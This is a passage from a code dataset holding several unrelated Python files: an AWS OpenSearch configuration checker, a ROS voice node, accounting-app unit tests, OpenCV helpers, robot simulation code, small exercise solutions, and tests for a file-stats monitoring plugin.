Available\"]\n\n def _checkFineGrainedAccessControl(self):\n self.results[\"FineGrainedAccessControl\"] = [-1, \"Not enabled\"]\n \n if 'DomainStatus' in self.attribute:\n if 'AdvancedSecurityOptions' in self.attribute['DomainStatus']:\n if 'Enabled' in self.attribute['DomainStatus']['AdvancedSecurityOptions']:\n self.results[\"FineGrainedAccessControl\"] = [1, \"Enabled\"]\n\n def _checkDomainWithinVpc(self):\n self.results[\"DomainWithinVPC\"] = [-1, \"Public\"]\n if \"DomainStatus\" in self.attribute:\n if \"VPCOptions\" in self.attribute[\"DomainStatus\"]:\n self.results[\"DomainWithinVPC\"] = [1, \"Private\"]\n\n def _checkInstanceVersion(self):\n instance_type = self.cluster_config[\"InstanceType\"]\n self.results[\"LatestInstanceVersion\"] = [1, instance_type]\n\n instance_info = aws_parseInstanceFamily(instance_type)\n\n instance_prefix_arr = instance_info[\"prefixDetail\"]\n instance_prefix_arr[\"version\"] = int(instance_prefix_arr[\"version\"]) + 1\n size = instance_info[\"suffix\"]\n latest_instance = (\n instance_prefix_arr[\"family\"]\n + str(instance_prefix_arr[\"version\"])\n + instance_prefix_arr[\"attributes\"]\n + size\n + \".search\"\n )\n\n if latest_instance in self.instance_type_list:\n self.results[\"LatestInstanceVersion\"] = [-1, instance_type]\n \n def _checkTSeriesForProduction(self):\n instance_type = self.cluster_config[\"InstanceType\"]\n type_arr = instance_type.split(\".\")\n family = type_arr[0]\n family_char = list(family)\n if family_char[0] == \"t\":\n self.results[\"TSeriesForProduction\"] = [-1, instance_type]\n\n def _checkEncryptionAtRest(self):\n self.results[\"EncyptionAtRest\"] = [-1, \"Disabled\"]\n if 'DomainStatus' in self.attribute:\n if 'EncryptionAtRestOptions' in self.attribute['DomainStatus']:\n if 'Enabled' in self.attribute['DomainStatus']['EncryptionAtRestOptions']:\n self.results[\"EncyptionAtRest\"] = [1, \"Enabled\"]\n\n def _checkNodeToNodeEncryption(self):\n self.results[\"NodeToNodeEncryption\"] = [-1, \"Disabled\"]\n if 'DomainStatus' in self.attribute:\n if 'NodeToNodeEncryptionOptions' in self.attribute['DomainStatus']:\n if 'Enabled' in self.attribute['DomainStatus']['NodeToNodeEncryptionOptions']:\n self.results[\"NodeToNodeEncryption\"] = [1, \"Enabled\"]\n \n def _checkSearchSlowLogs(self):\n self.results[\"SearchSlowLogs\"] = [-1, \"Disabled\"]\n if 'DomainStatus' in self.attribute:\n if 'LogPublishingOptions' in self.attribute['DomainStatus']:\n if 'SEARCH_SLOW_LOGS' in self.attribute['DomainStatus']['LogPublishingOptions']:\n self.results[\"SearchSlowLogs\"] = [1, \"Enabled\"]\n\n def _checkAutoTune(self):\n self.results[\"AutoTune\"] = [-1, \"Disabled\"]\n if 'DomainStatus' in self.attribute:\n if 'AutoTuneOptions' in self.attribute['DomainStatus']:\n if 'State' in self.attribute['DomainStatus']['AutoTuneOptions']:\n if self.attribute[\"DomainStatus\"][\"AutoTuneOptions\"][\"State\"] == \"ENABLED\":\n self.results[\"AutoTune\"] = [1, \"Enabled\"]\n\n def _checkUltrawarmEnabled(self):\n self.results[\"UltrawarmEnabled\"] = [-1, \"Disabled\"]\n if self.cluster_config[\"WarmEnabled\"]:\n self.results[\"UltrawarmEnabled\"] = [1, \"Enabled\"]\n\n def _checkColdStorage(self):\n self.results[\"ColdStorage\"] = [-1, \"Disabled\"]\n if self.cluster_config[\"ColdStorageOptions\"]:\n self.results[\"ColdStorage\"] = [1, \"Enabled\"]\n \n def _checkEbsStorageUtilisation(self):\n metric = \"FreeStorageSpace\"\n stats = self.getCloudWatchData(metric)\n\n dp = stats.get(\"Datapoints\")\n free_space = dp[0][\"Average\"]\n\n try:\n 
ebs_vol_size = self.domain_config[\"DomainConfig\"][\"EBSOptions\"][\"Options\"][\n \"VolumeSize\"\n ]\n except Exception as e:\n # print(\"Not EBSEnabled\")\n self.results[\"EBSStorageUtilisation\"] = [-1, \"Not EBSEnabled\"]\n return\n\n if free_space < 0.25 * (ebs_vol_size * 1000):\n self.results[\"EBSStorageUtilisation\"] = [\n -1,\n f\"{free_space} out of {ebs_vol_size * 1000} remaining\",\n ]\n return\n \n def _checkClusterStatus(self):\n metrics = [\"ClusterStatus.red\", \"ClusterStatus.yellow\", \"ClusterStatus.green\"]\n\n for metric in metrics:\n stats = self.getCloudWatchData(metric)\n dp = stats.get(\"Datapoints\")\n if dp and metric == \"ClusterStatus.green\":\n self.results[\"ClusterStatus\"] = [1, metric]\n elif dp:\n self.results[\"ClusterStatus\"] = [-1, metric]\n\n def _checkReplicaShard(self):\n self.results[\"ReplicaShard\"] = [-1, None]\n\n active = \"Shards.active\"\n primary = \"Shards.activePrimary\"\n\n stats_active = self.getCloudWatchData(active)\n dp_active = stats_active.get(\"Datapoints\")[0][\"Average\"]\n\n stats_primary = self.getCloudWatchData(primary)\n dp_primary = stats_primary.get(\"Datapoints\")[0][\"Average\"]\n\n if dp_active - dp_primary:\n self.results[\"ReplicaShard\"] = [1, \"Enabled\"]\n \n def __checkMasterNodeType(self):\n xmap = [\n {\n \"instance_count\": {\"min\": 1, \"max\": 10},\n \"type\": {\"min_vcpu\": 8, \"min_memoryInGiB\": 16},\n },\n {\n \"instance_count\": {\"min\": 11, \"max\": 30},\n \"type\": {\"min_vcpu\": 2, \"min_memoryInGiB\": 8},\n },\n {\n \"instance_count\": {\"min\": 31, \"max\": 75},\n \"type\": {\"min_vcpu\": 16, \"min_memoryInGiB\": 32},\n },\n {\n \"instance_count\": {\"min\": 76, \"max\": 125},\n \"type\": {\"min_vcpu\": 8, \"min_memoryInGiB\": 64},\n },\n {\n \"instance_count\": {\"min\": 126, \"max\": 200},\n \"type\": {\"min_vcpu\": 16, \"min_memoryInGiB\": 128},\n },\n ]\n\n instance_type = self.cluster_config[\"DedicatedMasterType\"]\n instance_info = aws_parseInstanceFamily(instance_type)\n\n nodes = self.cluster_config[\"InstanceCount\"]\n\n if nodes < 0 or nodes > self.NODES_LIMIT:\n print(_warn(f\"{nodes} not within the range of 0 & {self.NODES_LIMIT}\"))\n\n for row in xmap:\n if row[\"instance_count\"][\"min\"] <= nodes <= row[\"instance_count\"][\"max\"]:\n # Get instance attributes\n cpu = instance_info[\"specification\"][\"vcpu\"]\n memory = instance_info[\"specification\"][\"memoryInGiB\"]\n if not (\n row[\"type\"][\"min_vcpu\"] <= cpu\n and row[\"type\"][\"min_memoryInGiB\"] <= memory\n ):\n self.results[\"MasterNodeType\"] = [-1, instance_type]","repo_name":"aws-samples/service-screener-v2","sub_path":"services/opensearch/drivers/OpensearchCommon.py","file_name":"OpensearchCommon.py","file_ext":"py","file_size_in_byte":10788,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"85"} +{"seq_id":"19624273225","text":"#!/usr/bin/env python\nimport rospy\nfrom jsk_gui_msgs.msg import VoiceMessage\nimport numpy as np \nfrom std_msgs.msg import String\n\ndef voice_callback(data):\n sep = data.texts[0].split(' ')\n # print yolo_obj\n # print 'sep = ', sep\n\n if 'come' and 'to' and ('me' or 'Me') in sep:\n # voice_pub.publish('me')\n rospy.set_param('find_obj', 'person')\n elif 'grab' in sep:\n check_yolo = False\n for i in sep:\n # print i\n if i in yolo_obj:\n rospy.set_param('find_obj', i) # grab a cup\n check_yolo = True\n break\n if check_yolo == False:\n rospy.set_param('find_obj', 'nothing')\n\n \n else:\n rospy.set_param('find_obj', 'nothing')\n\n 
return\n\nif __name__ == '__main__':\n yolo_obj = ['person','bicycle','car','motorbike','aeroplane','bus','train','truck','boat','traffic light','fire hydrant','stop sign','parking meter','bench','bird','cat','dog','horse','sheep','cow','elephant','bear','zebra','giraffe','backpack','umbrella','handbag','tie','suitcase','frisbee','skis','snowboard','sports ball','kite','baseball bat','baseball glove','skateboard','surfboard','tennis racket','bottle','wine glass','cup','fork','knife','spoon','bowl','banana','apple','sandwich','orange','broccoli','carrot','hot dog','pizza','donut','cake','chair','sofa','pottedplant','bed','diningtable','toilet','tvmonitor','laptop','mouse','remote','keyboard','cell phone','microwave','oven','toaster','sink','refrigerator','book','clock','vase','scissors','teddy bear','hair drier','toothbrush']\n rospy.init_node('voice_reg', anonymous=True)\n rospy.loginfo('voice_reg initialization')\n # voice_pub = rospy.Publisher('/robot_project/voice_command', String, queue_size=10)\n rospy.Subscriber('/Tablet/voice', VoiceMessage, voice_callback)\n rospy.spin()","repo_name":"r06921017/RobotProject2018","sub_path":"voice_reg.py","file_name":"voice_reg.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"43149412582","text":"import io\nfrom unittest.mock import patch\nfrom readRecord import ReadRecordPage, ReadRecordOption\nfrom mock_db import MockDB\nfrom accessor import ExecutionStatus as es\nfrom freezegun import freeze_time\n\nclass TestReadRecord(MockDB):\n\n @patch(\"sys.stdout\", new_callable=io.StringIO)\n def test_show(self, _stdout):\n ReadRecordPage.show()\n output_lines = _stdout.getvalue().strip().split(\"\\n\")\n self.assertEqual(output_lines[0], \"%d: 查看本日紀錄\" % ReadRecordOption.TODAY)\n self.assertEqual(output_lines[1], \"%d: 查看本週紀錄\" % ReadRecordOption.WEEK)\n self.assertEqual(output_lines[2], \"%d: 查看本月紀錄\" % ReadRecordOption.MONTH)\n self.assertEqual(output_lines[3], \"%d: 查看指定時間紀錄\" % ReadRecordOption.OTHER)\n self.assertEqual(output_lines[4], \"%d: 回到上一頁\" % ReadRecordOption.BACK)\n \n @patch(\"sys.stdout\", new_callable=io.StringIO)\n def test_hints(self, _stdout):\n hints = [(ReadRecordPage.hintGetStartDate, \"請輸入 開始 時間(yyyy-mm-dd):\\n\"),\n (ReadRecordPage.hintGetEndDate, \"請輸入 結束 時間(yyyy-mm-dd):\\n\")]\n for hint in hints:\n hint[0]()\n self.assertMultiLineEqual(_stdout.getvalue(), hint[1])\n _stdout.truncate(0)\n _stdout.seek(0)\n\n @patch(\"sys.stdout\", new_callable=io.StringIO)\n @patch(\"builtins.input\", side_effect=[\"0\", \"6\", \"F\", \"1\", \"2\", \"3\", \"4\", \"5\"])\n def test_choose(self, _input, _stdout):\n self.assertEqual(ReadRecordPage.choose(), 1)\n self.assertEqual(_input.call_count, 4)\n self.assertEqual(ReadRecordPage.choose(), 2)\n self.assertEqual(_input.call_count, 5)\n self.assertEqual(ReadRecordPage.choose(), 3)\n self.assertEqual(_input.call_count, 6)\n self.assertEqual(ReadRecordPage.choose(), 4)\n self.assertEqual(_input.call_count, 7)\n self.assertEqual(ReadRecordPage.choose(), 5)\n self.assertEqual(_input.call_count, 8)\n self.assertEqual(_stdout.getvalue(), \"請輸入 1 到 5 之間的數字:\\n\" * 3)\n\n @patch.object(ReadRecordPage, \"viewToday\")\n @patch.object(ReadRecordPage, \"viewWeek\")\n @patch.object(ReadRecordPage, \"viewMonth\")\n @patch.object(ReadRecordPage, \"viewOther\")\n def test_execute(self, _viewOther, _viewMonth, _viewWeek, _viewToday):\n ReadRecordPage.execute(ReadRecordOption.OTHER)\n 
self.assertEqual(_viewOther.call_count, 1)\n ReadRecordPage.execute(ReadRecordOption.MONTH)\n self.assertEqual(_viewMonth.call_count, 1)\n ReadRecordPage.execute(ReadRecordOption.WEEK)\n self.assertEqual(_viewWeek.call_count, 1)\n ReadRecordPage.execute(ReadRecordOption.TODAY)\n self.assertEqual(_viewToday.call_count, 1)\n \n @patch(\"sys.stdout\", new_callable=io.StringIO)\n @freeze_time(\"2023-05-18\")\n def test_viewToday(self, _stdout):\n with self.mock_db_config:\n ReadRecordPage.setUp_connection_and_table()\n ReadRecordPage.viewToday()\n ReadRecordPage.tearDown_connection(es.NONE)\n output_lines = _stdout.getvalue().strip().split('\\n')\n self.assertEqual(len(output_lines), 1)\n self.assertEqual(output_lines[0], \"2 EXPENSE 類別: 住宿 金額: 2500.0 帳戶: Line Pay 地點: 其它 消費時間: 2023-05-18 扣款時間: 2023-05-18 發票號碼: 備註: taipei\")\n\n \n @patch(\"sys.stdout\", new_callable=io.StringIO)\n @freeze_time(\"2023-05-18\")\n def test_viewWeek(self, _stdout):\n with self.mock_db_config:\n ReadRecordPage.setUp_connection_and_table()\n ReadRecordPage.viewWeek()\n ReadRecordPage.tearDown_connection(es.NONE)\n output_lines = _stdout.getvalue().strip().split('\\n')\n self.assertEqual(len(output_lines), 2)\n self.assertEqual(output_lines[0], \"2 EXPENSE 類別: 住宿 金額: 2500.0 帳戶: Line Pay 地點: 其它 消費時間: 2023-05-18 扣款時間: 2023-05-18 發票號碼: 備註: taipei\")\n self.assertEqual(output_lines[1], \"4 EXPENSE 類別: 飲料 金額: 100.0 帳戶: Line Pay 地點: 飲料店 消費時間: 2023-05-19 扣款時間: 2023-05-19 發票號碼: 備註: 麻古-芝芝芒果\")\n \n @patch(\"sys.stdout\", new_callable=io.StringIO)\n @freeze_time(\"2023-05-18\")\n def test_viewMonth(self, _stdout):\n with self.mock_db_config:\n ReadRecordPage.setUp_connection_and_table()\n ReadRecordPage.viewMonth()\n ReadRecordPage.tearDown_connection(es.NONE)\n output_lines = _stdout.getvalue().strip().split('\\n')\n self.assertEqual(len(output_lines), 4)\n self.assertEqual(output_lines[0], \"1 EXPENSE 類別: 食物 金額: 50.0 帳戶: 現金 地點: 便利商店 消費時間: 2023-05-01 扣款時間: 2023-05-01 發票號碼: 12345678 備註: milk\")\n self.assertEqual(output_lines[1], \"2 EXPENSE 類別: 住宿 金額: 2500.0 帳戶: Line Pay 地點: 其它 消費時間: 2023-05-18 扣款時間: 2023-05-18 發票號碼: 備註: taipei\")\n self.assertEqual(output_lines[2], \"3 INCOME 類別: 其它 金額: 10000.0 帳戶: 中華郵政 地點: 其它 消費時間: 2023-05-22 扣款時間: 2023-05-23 發票號碼: 19970901 備註: \")\n self.assertEqual(output_lines[3], \"4 EXPENSE 類別: 飲料 金額: 100.0 帳戶: Line Pay 地點: 飲料店 消費時間: 2023-05-19 扣款時間: 2023-05-19 發票號碼: 備註: 麻古-芝芝芒果\")\n\n\n @patch(\"sys.stdout\", new_callable=io.StringIO)\n @patch.object(ReadRecordPage, \"hintGetEndDate\")\n @patch.object(ReadRecordPage, \"hintGetStartDate\")\n @patch(\"builtins.input\", side_effect=[\"2023-05-01\", \"2023-05-18\", \"2023-0123\", \"\", \"22A8\", \"\"])\n @freeze_time(\"2023-05-18\")\n def test_viewOther(self, _input, _hintGetStartDate, _hintGetEndDate, _stdout):\n with self.mock_db_config:\n ReadRecordPage.setUp_connection_and_table()\n ReadRecordPage.viewOther()\n ReadRecordPage.viewOther()\n ReadRecordPage.tearDown_connection(es.NONE)\n self.assertEqual(_hintGetStartDate.call_count, 3)\n self.assertEqual(_hintGetEndDate.call_count, 3)\n output_lines = _stdout.getvalue().strip().split('\\n')\n self.assertEqual(len(output_lines), 3)\n self.assertEqual(output_lines[0], \"1 EXPENSE 類別: 食物 金額: 50.0 帳戶: 現金 地點: 便利商店 消費時間: 2023-05-01 扣款時間: 2023-05-01 發票號碼: 12345678 備註: milk\")\n self.assertEqual(output_lines[1], \"2 EXPENSE 類別: 住宿 金額: 2500.0 帳戶: Line Pay 地點: 其它 消費時間: 2023-05-18 扣款時間: 2023-05-18 發票號碼: 備註: taipei\")\n self.assertEqual(output_lines[2], \"2 EXPENSE 類別: 住宿 金額: 2500.0 帳戶: Line Pay 地點: 其它 消費時間: 
2023-05-18 扣款時間: 2023-05-18 發票號碼: 備註: taipei\")\n\n @patch.object(ReadRecordPage, \"execute\")\n @patch.object(ReadRecordPage, \"choose\",\n side_effect=[ReadRecordOption.TODAY, ReadRecordOption.WEEK, ReadRecordOption.MONTH, ReadRecordOption.OTHER, ReadRecordOption.BACK],\n )\n @patch.object(ReadRecordPage, \"show\")\n def test_start(self, _show, _choose, _execute):\n ReadRecordPage.start()\n self.assertEqual(_show.call_count, 5)\n self.assertEqual(_choose.call_count, 5)\n self.assertEqual(_execute.call_count, 4)","repo_name":"jason-ntu/accounting","sub_path":"readRecordTest.py","file_name":"readRecordTest.py","file_ext":"py","file_size_in_byte":7475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21713149518","text":"import cv2\nimport numpy as np\n##\n## OpenCV (cv2) useful functions\n##\n\n## ============================================================================\n## READ AND DISPLAY FILES\n## ============================================================================\ndef readImg(file):\n return cv2.imread(file, cv2.IMREAD_UNCHANGED)\n\ndef displayImg(img, rectangles = ()):\n img_ = img.copy()\n\n # Draw rectangles, (xmin, xmax, wmin, ymax)\n for rectangle in rectangles:\n cv2.rectangle(img_, (rectangle[0], rectangle[2]), (rectangle[1], rectangle[3]), (255, 0, 0), 2)\n\n cv2.imshow('image', img_)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n return\n\ndef getImgSize(img):\n # returns size as a tuple (width, height, channels)\n result = img.shape\n if len(result) == 3:\n return (result[1], result[0], result[2])\n else:\n return (result[1], result[0], 1)\n\ndef saveToFile(img, filename):\n cv2.imwrite(filename,img)\n\n## ============================================================================\n## IMAGE TRANSFORMATIONS\n## ============================================================================\ndef scaleImg(img, scale_factor):\n return cv2.resize(img, (0,0), fx = scale_factor, fy = scale_factor)\n\ndef resizeImg(img, W, H):\n size = getImgSize(img)\n w = size[0]\n h = size[1]\n Fx = W/w\n Fy = H/h\n return cv2.resize(img, (0,0), fx = Fx, fy = Fy)\n\ndef resizeCanvas(img, X, Y):\n M = np.float32([[1, 0, 0], [0, 1, 0]])\n return cv2.warpAffine(img, M, (X, Y))\n\ndef traslateImg(img, deltaX, deltaY):\n M = np.float32([[1, 0, deltaX], [0, 1, deltaY]])\n size = getImgSize(img)\n size = (size[0],size[1])\n return cv2.warpAffine(img, M, size)\n\ndef rotateImg(img, angle_deg):\n # Performs a counter-clockwise rotation\n\n size = getImgSize(img)\n width = size[0]\n height = size[1]\n\n angle_rad = angle_deg * np.pi / 180.0\n final_width = int(np.absolute(np.sin(angle_rad)) * height +\n np.absolute(np.cos(angle_rad) * width))\n final_height = int(np.absolute(np.cos(angle_rad)) * height +\n np.absolute(np.sin(angle_rad) * width))\n\n max_dimension = int(np.sqrt(width*width+height*height))+1\n\n ## 1. Increase the size of the canvas and move to the center\n img = resizeCanvas(img, max_dimension, max_dimension)\n img = traslateImg(img, int((max_dimension - width)/2), int((max_dimension - height)/2))\n\n ## 2. Rotate around the center\n M = cv2.getRotationMatrix2D(((max_dimension - 1) / 2.0, (max_dimension - 1) / 2.0), angle_deg, 1)\n img = cv2.warpAffine(img, M, (max_dimension, max_dimension))\n\n ## 3. 
Resize to the final dimension\n img = traslateImg(img, int((final_width - max_dimension) / 2.0), int((final_height - max_dimension) / 2.0))\n img = resizeCanvas(img, final_width, final_height)\n\n ##\n return img\n\ndef addAlphaChannel(img):\n if getImgSize(img)[2] != 3:\n return img\n\n b_channel, g_channel, r_channel = cv2.split(img)\n alpha_channel = np.ones(b_channel.shape, dtype=b_channel.dtype) * 50\n return cv2.merge((b_channel, g_channel, r_channel, alpha_channel))\n\ndef adjustGamma(image, gamma=1.0):\n invGamma = 1.0 / gamma\n table = np.array([((i / 255.0) ** invGamma) * 255\n for i in np.arange(0, 256)]).astype(\"uint8\")\n return cv2.LUT(image, table)\n\ndef placeImg(img_small, img_large, X, Y):\n # places a small image onto a large one at position (X,Y)\n\n size = getImgSize(img_small)\n width_small = size[0]\n height_small = size[1]\n size = getImgSize(img_large)\n width_large = size[0]\n height_large = size[1]\n\n img_small = resizeCanvas(img_small, width_large, height_large)\n img_small = traslateImg(img_small, X, Y)\n\n img_small_no_alpha = cv2.cvtColor(img_small, cv2.COLOR_BGR2GRAY)\n ret, mask = cv2.threshold(img_small_no_alpha, 10, 255, cv2.THRESH_BINARY)\n mask = cv2.bitwise_not(mask)\n\n img_large = cv2.bitwise_and(img_large, img_large, mask = mask)\n\n return cv2.add(addAlphaChannel(img_large), img_small)\n\n #l_img[y_offset:y_offset + s_img.shape[0], x_offset:x_offset + s_img.shape[1]] = s_img\n","repo_name":"frankovacevich/ObjectDetectionRepo","sub_path":"images/helperCV2.py","file_name":"helperCV2.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15305114984","text":"\"\"\"Interface between Bullet and the Dynamic Graph for solo12 \"\"\"\n\n\nfrom robot_properties_solo.solo8wrapper import Solo8Robot, Solo8Config\nfrom dg_blmc_robots.solo.dg_bullet_solo import DgBulletSoloBaseRobot\n\n\nclass QuadrupedBulletRobot(DgBulletSoloBaseRobot):\n def __init__(\n self,\n use_fixed_base=False,\n record_video=False,\n init_sliders_pose=4 * [0.5],\n ):\n\n super(QuadrupedBulletRobot, self).__init__(\n Solo8Robot,\n Solo8Config,\n use_fixed_base,\n record_video,\n init_sliders_pose,\n )\n\n self.q0[0] = 0.2\n self.q0[1] = 0.0\n self.q0[2] = 0.22\n self.q0[6] = 1.0\n self.q0[7] = 0.8\n self.q0[8] = -1.6\n self.q0[9] = 0.8\n self.q0[10] = -1.6\n self.q0[11] = -0.8\n self.q0[12] = 1.6\n self.q0[13] = -0.8\n self.q0[14] = 1.6\n\n # Sync the current robot state to the graph input signals.\n self._sim2signal()\n\n\ndef get_robot(\n use_fixed_base=False,\n record_video=False,\n init_sliders_pose=4 * [0.5],\n with_gui=True,\n):\n return QuadrupedBulletRobot(\n use_fixed_base, record_video, init_sliders_pose\n )\n\n\n# Alias to new solo8 name.\nSolo8BulletRobot = QuadrupedBulletRobot\nget_solo8_robot = get_robot\n","repo_name":"machines-in-motion/dg_blmc_robots","sub_path":"python/dg_blmc_robots/solo/solo8_bullet.py","file_name":"solo8_bullet.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"8712277471","text":"class queue:\r\n\r\n class Full(Exception):\r\n pass\r\n\r\n class Empty(Exception):\r\n pass\r\n\r\n def __init__(self):\r\n\r\n self.start = 0\r\n self.end = 0\r\n self.stk = []\r\n\r\n def push(self, x):\r\n self.stk.append(x)\r\n self.end += 1\r\n\r\n def pop(self):\r\n if self.empty():\r\n raise queue.Empty\r\n self.start += 1\r\n return self.stk[self.start - 
1]\r\n\r\n def size(self):\r\n return self.end - self.start\r\n\r\n def empty(self) -> bool:\r\n return self.size() <= 0\r\n\r\n def front(self):\r\n if self.empty():\r\n raise queue.Empty\r\n return self.stk[self.start]\r\n\r\n def back(self):\r\n if self.empty():\r\n raise queue.Empty\r\n return self.stk[self.end - 1]\r\n\r\nimport sys\r\nn = int(sys.stdin.readline())\r\nfor i in range(n):\r\n count = 1\r\n q = queue()\r\n N, M = map(int,sys.stdin.readline().split())\r\n l = list(map(int,sys.stdin.readline().split()))\r\n answer = (l[M],M)\r\n for i in range(len(l)):\r\n q.push((l[i],i))\r\n l.sort()\r\n while True:\r\n if l[-1] == q.front()[0]:\r\n if q.front() == answer:\r\n print(count)\r\n break\r\n l.pop()\r\n q.pop()\r\n count += 1\r\n else:\r\n q.push(q.pop())\r\n","repo_name":"2022-rescue-macbook/rescue-macbook-py","sub_path":"code/42792211.py3","file_name":"42792211.py3","file_ext":"py3","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"72219982357","text":"# Defines two classes, Point() and Triangle().\n# An object for the second class is created by passing named arguments,\n# point_1, point_2 and point_3, to its constructor.\n# Such an object can be modified by changing one point, two or three points\n# thanks to the method change_point_or_points().\n# At any stage, the object maintains correct values\n# for perimeter and area.\n#\n# Written by *** and Eric Martin for COMP9021\n\n\nfrom math import sqrt\n\n\nclass PointError(Exception):\n def __init__(self, message):\n self.message = message\n\n\nclass Point():\n def __init__(self, x = None, y = None):\n if x is None and y is None:\n self.x = 0\n self.y = 0\n elif x is None or y is None:\n raise PointError('Need two coordinates, point not created.')\n else:\n self.x = x\n self.y = y\n \n # Possibly define other methods\n\n\nclass TriangleError(Exception):\n def __init__(self, message):\n self.message = message\n\ndef line(x1,y1,x2,y2,x3,y3):\n if x1==x2==x3:\n return 0\n elif x1==x2 :\n if y1 == y2:\n return 0\n else:\n return 1\n elif x2==x3 :\n if y2 == y3:\n return 0\n else:\n return 1\n elif x1==x3 :\n if y1 == y3:\n return 0\n else:\n return 1 \n else:\n if not((y2-y1)/(x2-x1) == (y3-y2)/(x3-x2)):\n return 1\n else:\n return 0\n\nclass Triangle:\n def __init__(self, *, point_1, point_2, point_3):\n if line(point_1.x,point_1.y,point_2.x,point_2.y,point_3.x,point_3.y):\n self.point_1 = point_1\n self.point_2 = point_2\n self.point_3 = point_3\n Triangle.perimeter(self)\n Triangle.area(self)\n else:\n raise TriangleError('Incorrect input, triangle not created.')\n \n\n def perimeter(self) :\n \n self.L_1 = sqrt((self.point_1.x-self.point_2.x)**2+\\\n (self.point_1.y-self.point_2.y)**2)\n self.L_2 = sqrt((self.point_1.x-self.point_3.x)**2+\\\n (self.point_1.y-self.point_3.y)**2)\n self.L_3 = sqrt((self.point_2.x-self.point_3.x)**2+\\\n (self.point_2.y-self.point_3.y)**2)\n self.perimeter = self.L_1+self.L_2+self.L_3\n \n def area(self) :\n s = (self.L_1+self.L_2+self.L_3)/2\n S = sqrt(s*(s-self.L_1)*(s-self.L_2)*(s-self.L_3))\n self.area = S\n \n def change_point_or_points(self, *, point_1 = None,point_2 = None, point_3 = None):\n inter_1 = self.point_1\n inter_2 = self.point_2\n inter_3 = self.point_3\n if not(point_1 is None):\n inter_1 = point_1\n if not(point_2 is None):\n inter_2 = point_2\n if not(point_3 is None):\n inter_3 = point_3\n \n if not(line(inter_1.x,inter_1.y,inter_2.x,inter_2.y,inter_3.x,inter_3.y)):\n print('Incorrect 
input, triangle not modified.')\n elif line(inter_1.x,inter_1.y,inter_2.x,inter_2.y,inter_3.x,inter_3.y):\n self.point_1=inter_1\n self.point_2=inter_2\n self.point_3=inter_3\n Triangle.perimeter(self)\n Triangle.area(self)\n \n","repo_name":"Elijahlen/Python_quizzes","sub_path":"Quizzes/quiz_6/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"36674084857","text":"# -*- encoding: utf-8\n# pylint: disable=protected-access,redefined-outer-name\nimport os\nimport ast\nimport pytest # type: ignore[import]\nfrom testlib import import_module\n\n\n@pytest.fixture(scope=\"module\")\ndef mk_filestats():\n return import_module(\"agents/plugins/mk_filestats.py\")\n\n\ndef test_lazy_file(mk_filestats):\n lfile = mk_filestats.FileStat(\"no such file\")\n assert lfile.path == \"no such file\"\n assert lfile.size is None\n assert lfile.age is None\n assert lfile.stat_status == \"file vanished\"\n\n assert isinstance(ast.literal_eval(lfile.dumps()), dict)\n\n lfile = mk_filestats.FileStat(__file__) # this should exist...\n assert lfile.path == __file__\n assert lfile.size == os.stat(__file__).st_size\n assert lfile.stat_status == \"ok\"\n assert isinstance(lfile.age, int)\n assert isinstance(ast.literal_eval(lfile.dumps()), dict)\n\n\n@pytest.mark.parametrize(\"config\", [({}), ({\n \"input_unknown\": None\n}), ({\n \"input_one\": None,\n \"input_two\": None\n})])\ndef test_get_file_iterator_invalid(mk_filestats, config):\n with pytest.raises(ValueError):\n mk_filestats.get_file_iterator(config)\n\n\n@pytest.mark.parametrize(\"config,pat_list\", [\n ({\n \"input_patterns\": \"foo\"\n }, [\"foo\"]),\n ({\n \"input_patterns\": '\"foo bar\" gee*'\n }, [\"foo bar\", \"gee*\"]),\n])\ndef test_get_file_iterator_pattern(mk_filestats, config, pat_list):\n iter_obj = mk_filestats.get_file_iterator(config)\n assert isinstance(iter_obj, mk_filestats.PatternIterator)\n assert iter_obj._patterns == [os.path.abspath(p) for p in pat_list]\n\n\n@pytest.mark.parametrize(\"operator,values,results\", [\n ('>', (2000., 1024, \"1000\"), (True, False, False)),\n ('>=', (2000., 1024, \"1000\"), (True, True, False)),\n ('<', (2000., 1024, \"1000\"), (False, False, True)),\n ('<=', (2000., 1024, \"1000\"), (False, True, True)),\n ('==', (2000., 1024, \"1000\"), (False, True, False)),\n])\ndef test_numeric_filter(mk_filestats, operator, values, results):\n num_filter = mk_filestats.AbstractNumericFilter('%s1024' % operator)\n for value, result in zip(values, results):\n assert result == num_filter._matches_value(value)\n\n\n@pytest.mark.parametrize(\"invalid_arg\", ['<>1024', '1\", \"filter_age\": \"==0\", \"filter_regex\": \"foo\"}\n filters = mk_filestats.get_file_filters(config)\n assert len(filters) == 3\n assert isinstance(filters[0], mk_filestats.RegexFilter)\n assert isinstance(filters[1], mk_filestats.AbstractNumericFilter)\n assert isinstance(filters[2], mk_filestats.AbstractNumericFilter)\n\n\n@pytest.mark.parametrize(\"config\", [{}, {\"output\": \"/dev/null\"}])\ndef test_get_ouput_aggregator_invalid(mk_filestats, config):\n with pytest.raises(ValueError):\n mk_filestats.get_output_aggregator(config)\n\n\n@pytest.mark.parametrize(\"output_value\", [\"count_only\", \"file_stats\"])\ndef test_get_ouput_aggregator(mk_filestats, output_value):\n aggr = mk_filestats.get_output_aggregator({\"output\": output_value})\n assert aggr is getattr(mk_filestats, \"output_aggregator_%s\" % 
